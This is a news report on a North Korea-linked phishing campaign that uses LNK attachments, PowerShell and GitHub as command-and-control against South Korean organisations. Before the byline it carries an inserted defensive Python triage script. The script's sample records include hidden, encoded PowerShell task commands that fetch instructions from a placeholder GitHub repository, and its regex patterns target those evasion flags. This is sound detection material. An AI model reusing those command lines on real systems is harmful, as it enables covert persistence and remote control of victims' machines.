securityaffairs.com 4/6/2026, 8:09:06 PM · via preferred

North Korea uses GitHub C2 in South Korea phishing campaign

Primary Source fortinet.com

North Korea-linked threat actors are using phishing LNK files and GitHub as C2 servers to target South Korean organisations. The attacks start with phishing emails whose LNK attachment drops a decoy PDF together with a PowerShell script.

According to FortiGuard Labs, researchers detected a series of LNK files targeting South Korea that use a multi-stage scripting process and leverage GitHub as C2 infrastructure to evade detection. Older variants date back to 2024, and their metadata helped the researchers track similar attacks distributing XenoRAT. The latest campaigns embed the decoding functions and encoded payloads directly in the LNK files, strip identifying metadata, and open a decoy PDF while the malicious script executes.

The PowerShell component collects system details and communicates with GitHub through hidden repositories, using scheduled tasks to maintain persistence and to periodically pull commands from the C2. The operation relies on multiple GitHub accounts to manage activity, and a keep-alive script uploads network logs to GitHub so the operators can monitor victims in real time and plan further exploitation.
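As a defender-side illustration of the persistence pattern described above (a scheduled task that launches PowerShell and polls GitHub for commands), the following is an added example, not code from the article or from FortiGuard's report: a small Python triage routine run over constructed scheduled-task records. The task names, command lines, GitHub account and repository names are all constructed placeholders.

```python
import re

# Constructed sample records shaped like scheduled-task creation events
# (task name plus the command line the task runs). Not real telemetry.
SAMPLE_EVENTS = [
    "TaskName=\\Microsoft\\Windows\\Defrag\\ScheduledDefrag Command=%windir%\\system32\\defrag.exe -c -h -k -g",
    "TaskName=\\OneDriveSync Command=powershell.exe -WindowStyle Hidden -NoProfile "
    "-Command \"iwr https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/EXAMPLE-REPO/main/cmd.txt\"",
    "TaskName=\\Backup Command=C:\\Tools\\backup.exe --github",
    "TaskName=\\SysCheck Command=pwsh.exe -w hidden -ep bypass -EncodedCommand BASE64PLACEHOLDER",
]

# GitHub endpoints a C2 channel would touch (raw content, REST API, web).
GITHUB_HOSTS = re.compile(r"(?:raw\.githubusercontent\.com|api\.github\.com|github\.com)", re.I)
# PowerShell launchers, with or without the .exe suffix.
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# Flags that hide the window, skip the profile, bypass policy or carry an encoded script.
EVASION = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|e(?:nc|ncodedcommand)\b|ep\s+bypass)", re.I)

def parse_event(line):
    """Split one constructed record into (task_name, command); None if malformed."""
    m = re.match(r"TaskName=(?P<task>\S+)\s+Command=(?P<cmd>.*)$", line)
    return (m.group("task"), m.group("cmd")) if m else None

def score_task(command):
    """Return the list of reasons a task command line looks like PowerShell/GitHub C2 persistence."""
    reasons = []
    if POWERSHELL.search(command):
        reasons.append("powershell launcher")
        if EVASION.search(command):
            reasons.append("hidden/encoded/no-profile flags")
        if GITHUB_HOSTS.search(command):
            reasons.append("github host in command line")
    return reasons

def flag_suspicious(events):
    """Map task name -> reasons for every record that hits at least two indicators."""
    hits = {}
    for line in events:
        parsed = parse_event(line)
        if parsed is None:
            continue
        task, cmd = parsed
        reasons = score_task(cmd)
        if len(reasons) >= 2:   # one indicator alone is too noisy for triage
            hits[task] = reasons
    return hits

if __name__ == "__main__":
    for task, reasons in flag_suspicious(SAMPLE_EVENTS).items():
        print(task, "->", ", ".join(reasons))
```

An encoded command hides the GitHub host from the command line itself, which is why the hidden/encoded flags count as an indicator on their own; in production the decoded script or the task's outbound connections would be the next pivot.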


Article by CyberSIXT